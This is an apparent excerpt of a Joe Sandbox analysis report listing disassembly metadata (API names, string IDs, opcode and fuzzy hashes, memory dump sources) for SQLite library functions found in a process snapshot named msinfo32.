                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strlike
                                                                                                              • String ID: \$m
                                                                                                              • API String ID: 933858916-1477243525
                                                                                                              • Opcode ID: e706ada53cd9f5f5c27932944ca345c7a78729bb14a7f1ea84bf4882fb7b341d
                                                                                                              • Instruction ID: 43169751724bbd961f5e865d0cd471fae9737a28945d5cabdee1654173312146
                                                                                                              • Opcode Fuzzy Hash: e706ada53cd9f5f5c27932944ca345c7a78729bb14a7f1ea84bf4882fb7b341d
                                                                                                              • Instruction Fuzzy Hash: 8A12C474A042598FDB40DFA8C880AADBBF2BF88314F248419E855EB354D739EC46CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log
                                                                                                              • String ID: `"a
                                                                                                              • API String ID: 632333372-704101349
                                                                                                              • Opcode ID: 6c5cceae02f90842606a9d961666776903d36c9ffeb6ba510de0946a65e1294e
                                                                                                              • Instruction ID: e60dee9a12a933685e8666c935eb7587c5c33cb943553d0d4c24d77e9762b505
                                                                                                              • Opcode Fuzzy Hash: 6c5cceae02f90842606a9d961666776903d36c9ffeb6ba510de0946a65e1294e
                                                                                                              • Instruction Fuzzy Hash: 9551F9B861AA09DFDB44CF5CC092E497BA0F74A360F28C91BED158B358D374D881EB12
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strnicmp
                                                                                                              • String ID: '$null
                                                                                                              • API String ID: 1961171630-2611297978
                                                                                                              • Opcode ID: 6d6125b382316b2c503c9b4f3c5cafd53db4ccdd136e4724a21132cfef85c612
                                                                                                              • Instruction ID: af0257af9eb476f9cce6cb4f110c4b3705a3f718349cc5c40008daa320e02d28
                                                                                                              • Opcode Fuzzy Hash: 6d6125b382316b2c503c9b4f3c5cafd53db4ccdd136e4724a21132cfef85c612
                                                                                                              • Instruction Fuzzy Hash: A231DED0B4C9CA4EF70089A4C465392BBD36B8E31BF78C165C5864E28AE669D4E54B42
                                                                                                              APIs
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E260B2
                                                                                                                • Part of subcall function 61E1865C: InterlockedCompareExchange.KERNEL32 ref: 61E1867C
                                                                                                                • Part of subcall function 61E1865C: InterlockedCompareExchange.KERNEL32 ref: 61E186C3
                                                                                                                • Part of subcall function 61E1865C: InterlockedCompareExchange.KERNEL32 ref: 61E186E3
                                                                                                                • Part of subcall function 61E185E6: sqlite3_win32_sleep.SQLITE3 ref: 61E1863E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E2617D
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                              • String ID: winDelete
                                                                                                              • API String ID: 3336177498-3936022152
                                                                                                              • Opcode ID: 3600891162421721e6d1f8fa45676777f00912c89604ab1b4eaa90f45fc918de
                                                                                                              • Instruction ID: 3b00e225592ca5191c079bd99709a03937fd3ccec11a08c28fc5fc0e532a6c9d
                                                                                                              • Opcode Fuzzy Hash: 3600891162421721e6d1f8fa45676777f00912c89604ab1b4eaa90f45fc918de
                                                                                                              • Instruction Fuzzy Hash: BC31D470A086968BEB005FA5C8A0A9E7AF4EF49358F30C729EC5597385D738D4429B92
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$ProtectQuery
                                                                                                              • String ID: @
                                                                                                              • API String ID: 1027372294-2766056989
                                                                                                              • Opcode ID: fda0bb641ca100852ae0b49bb33be338f5b982c28ae7e5d3439ab30b7da5f0ca
                                                                                                              • Instruction ID: 8d4021f236e4b410ecd5b95d33833d118e3d6733507a1e438a1afa340e3ec65a
                                                                                                              • Opcode Fuzzy Hash: fda0bb641ca100852ae0b49bb33be338f5b982c28ae7e5d3439ab30b7da5f0ca
                                                                                                              • Instruction Fuzzy Hash: 3A314AB29157028FDB10DF78C58461EBBE0FB95754F59CA5CE85897340E734E884CB92
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 3
                                                                                                              • API String ID: 0-1842515611
                                                                                                              • Opcode ID: 64553797d164d143313a669df00b72d9bd358ff2a115a4b9fc01bd42805f8df1
                                                                                                              • Instruction ID: 13c68e7d0d27a0622058205f3a7885ad47da0fab38c0d2582d0ad46b8b72665b
                                                                                                              • Opcode Fuzzy Hash: 64553797d164d143313a669df00b72d9bd358ff2a115a4b9fc01bd42805f8df1
                                                                                                              • Instruction Fuzzy Hash: 51317C749043568BDB60CF69C8C0B89BBF4FB16318F6485A9E89C9B345E730D984CF91
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E14017
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1408C
                                                                                                                • Part of subcall function 61E13D7F: sqlite3_mutex_try.SQLITE3(?,?,?,61E13DFF), ref: 61E13D1F
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
                                                                                                              • String ID: #
                                                                                                              • API String ID: 2389339727-1885708031
                                                                                                              • Opcode ID: 926ae2b52d0ac5a68cb213fe7d25c94c29df1b7f21d13467dc8a7c437752a2b7
                                                                                                              • Instruction ID: be59f4d3fb6e307c305fa137762aeb693b5bdc9c36588164b1a69f8aefe745cd
                                                                                                              • Opcode Fuzzy Hash: 926ae2b52d0ac5a68cb213fe7d25c94c29df1b7f21d13467dc8a7c437752a2b7
                                                                                                              • Instruction Fuzzy Hash: F711607060824ACFD700DFAAD48185AB7B5FF8935DF24C52AE8148B314D771ED91CB92
                                                                                                              APIs
                                                                                                              • sqlite3_stricmp.SQLITE3(00000000,?,?,61E6334F), ref: 61E039CF
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmp
                                                                                                              • String ID: sqlite_master$sqlite_temp_master
                                                                                                              • API String ID: 912767213-3047539776
                                                                                                              • Opcode ID: 9f6041365354eaa8d1f7bb0f8c7df68677f03e90ed5e8671f88c1b64388aef1f
                                                                                                              • Instruction ID: 7d765049e0c6d8cbbc48031e66ecd9d46b81c3b09a05d1cda12c4b9520b58985
                                                                                                              • Opcode Fuzzy Hash: 9f6041365354eaa8d1f7bb0f8c7df68677f03e90ed5e8671f88c1b64388aef1f
                                                                                                              • Instruction Fuzzy Hash: 8C11A9B17042164FAB00DFADC88196BB7F4FFC8709B698869DC64D7305D370D82187A1
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D5FF
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D60B
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                              • String ID:
                                                                                                              • API String ID: 3265351223-3916222277
                                                                                                              • Opcode ID: 1a3f78a35ac6a48ca870a7142d9f21fc3f05ea2b319a461e2f8582b8a1bedd9f
                                                                                                              • Instruction ID: af1eb661bef2e3a8912268a60f0180e5285a43f998984b12f397a241703889bb
                                                                                                              • Opcode Fuzzy Hash: 1a3f78a35ac6a48ca870a7142d9f21fc3f05ea2b319a461e2f8582b8a1bedd9f
                                                                                                              • Instruction Fuzzy Hash: 1F115E746086458BDF059FA8D0CA65A7FF0FF59318F248899D8A8CB24AD771C9A0C792
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D58D
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D599
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_context, sqlite3_value_numeric_type
                                                                                                              • String ID:
                                                                                                              • API String ID: 3265351223-3916222277
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1008D), ref: 61E10036
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter
                                                                                                              • String ID: "a$"a
                                                                                                              • API String ID: 3053899952-4156780559
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E37BD1
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_str_vappendf.SQLITE3 ref: 61E37C1C
                                                                                                                • Part of subcall function 61E20FC2: sqlite3_str_append.SQLITE3 ref: 61E21041
                                                                                                                • Part of subcall function 61E20FC2: sqlite3_str_append.SQLITE3 ref: 61E21078
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append$, sqlite3_config, sqlite3_initialize, sqlite3_mutex_enter, sqlite3_mutex_leave, sqlite3_str_vappendf
                                                                                                              • String ID: F
                                                                                                              • API String ID: 4014417345-1304234792